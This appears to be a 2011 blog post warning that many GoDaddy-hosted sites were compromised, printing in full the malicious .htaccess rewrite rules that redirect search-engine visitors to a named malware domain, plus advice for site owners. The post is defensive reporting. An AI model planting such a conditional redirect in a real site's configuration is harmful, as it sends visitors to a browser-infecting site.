Saturday, September 17, 2011

GoDaddy websites Compromised with Malware

          Many sites hosted on GoDaddy shared servers getting compromised today  with a conditional redirection to sokoloperkovuskeci.com. In all 445 cases the .htaccess file (a main Apache web server configuration file) was modified to redirect users to a malware site when they were referred by one of a list of search engines. These redirections attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy hosted sites. So it looks like a compromise on their own servers (similar to what has happened in the past).

          This is caused by this entry that is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

           The malware checks if anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and if they are, redirects them to that domain (sokoloperkovuskeci.com). In there, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site asap to protect your own users.

          GoDaddy says they are working with customers to resolve the issue, but if you have a GoDaddy account you should check on this, minimally by Googling for your site and following the link (only if your browser is all patched up and you have sufficient other protections).DomainNameWire also smartly recommends that you check with Google, other search engines and security companies to make sure you haven't been blacklisted.

0 comments:

Post a Comment